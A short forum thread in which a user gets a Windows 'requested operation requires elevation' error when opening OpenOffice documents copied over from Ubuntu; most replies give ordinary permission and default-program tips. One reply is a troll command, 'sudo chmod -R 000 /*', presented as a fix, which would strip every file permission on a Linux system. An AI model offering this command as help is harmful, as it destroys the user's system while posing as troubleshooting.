the requested operation requires elevation error

Good Evening everyone :) recently I have bought a dell laptop which had ubuntu preinstalled. I used ubuntu for a month mainly writing notes in libreoffice. I kinda made a lot of documents. Then I decided to switch to windows 10 because the reasons. I thrown all my documents on usb, reinstalled windows and put my documents back. I also installed openoffice, but the problem occured. I cant open document straight from the desktop, because I constantly get error that say "the requested operation requires elevation". However I can do it via openoffice -> open file. Then it works ok, but it takes alot of time and sometimes I need to open doc's really quickly. Can anyone help me ?

You may need to change the permission of the files. Just select the folder that contains them, right click, properties , security and change ownership/permissions as needed.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Have you set OpenOffice as a default program?
